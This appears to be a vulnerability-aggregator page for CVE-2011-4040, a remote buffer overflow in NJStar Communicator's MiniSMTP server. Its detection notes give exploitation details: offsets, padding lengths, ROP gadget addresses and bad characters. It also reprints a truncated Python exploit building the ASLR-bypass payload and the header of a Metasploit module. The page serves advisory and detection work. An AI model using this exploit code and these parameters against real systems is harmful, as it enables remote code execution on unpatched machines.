CVE-2011-4040
published 2011-11-21CVE-2011-4040: Buffer overflow in MiniSmtp 3.0.11818 in NJStar Communicator allows remote attackers to execute arbitrary code via a crafted packet.
PriorityP267critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
65.68%
99.2th percentile
Buffer overflow in MiniSmtp 3.0.11818 in NJStar Communicator allows remote attackers to execute arbitrary code via a crafted packet.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| njstar | njstar_communicator | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x8d\x44\x24\x80\xff\xe0\x90\x90
- →The MiniSMTP server listens on TCP port 25 and is vulnerable to a stack buffer overflow triggered by a crafted packet. The overflow offset is 247 bytes before the return address. ↗
- →The MiniSMTP application continues to run in the background even after the NJStar Communicator GUI is shut down, meaning the attack surface persists after apparent application closure. ↗
- →The Metasploit exploit uses an egg-hunter technique with the tag 'w00t'; network traffic containing this egg tag pattern on port 25 is a strong indicator of exploitation attempts. ↗
- →The ASLR-bypass exploit sends four sequential SMTP packets with specific padding lengths (275, 271, 263, 171+22 bytes) and ROP gadget return addresses from the application's own module (0x41122d, 0x41122b) to bypass ASLR on Windows 7. ↗
- →The exploit uses EXITFUNC=thread, meaning the spawned shell runs in a thread context; process-level monitoring may not catch process creation directly from the SMTP server process. ↗
- →The shellcode in the ASLR-bypass exploit launches calc.exe (bytes 0x63 0x61 0x6C 0x63 / 'calc' and 0x2E 0x65 0x78 0x65 / '.exe') as a proof-of-concept; production payloads would substitute this shellcode at the same offset. ↗
- ·The Metasploit module targets Windows XP SP1/SP2/SP3 and Windows Server 2003 SP0 using hardcoded JMP ESP addresses in kernel32.dll, ntdll.dll, and user32.dll. These addresses are version-specific and will not work on patched or different OS builds. ↗
- ·The ASLR-bypass exploit targets Windows 7 Ultimate and uses ROP gadgets from the application's own non-ASLR module at fixed addresses (0x41122d, 0x41122b). This only works if the NJStar module is not ASLR-enabled. ↗
- ·The null byte (0x00) is a bad character for the payload; any shellcode or payload used must avoid null bytes. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
NJStar Communicator MiniSmtp - Buffer Overflow (ASLR Bypass)
exploitdb·2011-12-03
CVE-2011-4040 NJStar Communicator MiniSmtp - Buffer Overflow (ASLR Bypass)
NJStar Communicator MiniSmtp - Buffer Overflow (ASLR Bypass)
---
# Exploit Title: NJStart Communicator MiniSmtp Buffer Overflow [ASLR Bypass]
# Date: 02/12/11
# Author: Zune - Julian Pulido
# Software Link: http://www.njstar.com/download/njcom.exe
# Version: 3.0
# Build: 11818 and previous
# Tested on: Windows 7 Ultimate
# CVE:2011-4040
#! /usr/local/bin/python
import socket
import time
carriage= chr(0xd)
#######################################
Padding1= chr(0x31)* 275
Jump= '\x8d\x44\x24\x80\xff\xe0\x90\x90'
Junk1= chr(0x90)* 4
return1= '\x2d\x12\x41' # pop retn
egg1= Padding1+Jump+Junk1+return1+carriage
#######################################
Padding2= chr(0x32)* 271
return2= '\x2b\x12\x41' # pop pop pop retn
egg2= Padding2+return2+carriage
#######################################
Exploit-DB
NJStar Communicator 3.00 - MiniSMTP Server Remote (Metasploit)
exploitdb·2011-10-31
CVE-2011-4040 NJStar Communicator 3.00 - MiniSMTP Server Remote (Metasploit)
NJStar Communicator 3.00 - MiniSMTP Server Remote (Metasploit)
---
##
# Exploit Title: NJStar Communicator 3.00 MiniSMTP Server Remote Exploit
# Date: 10/31/2011
# Author: Dillon Beresford
# Twitter: https://twitter.com/#!/D1N
# Software Link: http://www.njstar.com/download/njcom.exe
# Version: 3.00 and prior
# Build: 11818 and prior
# Tested on: Windows XP SP3/SP2/SP1 and Windows Server 2003 SP0
# CVE : NONE
# Shouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran,
# manils, d0tslash, mublix, halsten, and everyone at AHA!
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
Metasploit
NJStar Communicator 3.00 MiniSMTP Buffer Overflow
metasploit
NJStar Communicator 3.00 MiniSMTP Buffer Overflow
NJStar Communicator 3.00 MiniSMTP Buffer Overflow
This module exploits a stack buffer overflow vulnerability in NJStar Communicator Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple NJStar products, and will continue to run in the background even if the software is already shutdown. According to the vendor's testimonials, NJStar software is also used by well known companies such as Siemens, NEC, Google, Yahoo, eBay; government agencies such as the FBI, Department of Justice (HK); as well as a long list of universities such as Yale, Harvard, University of Tokyo, etc.
No writeups or analysis indexed.
2011-11-21
Published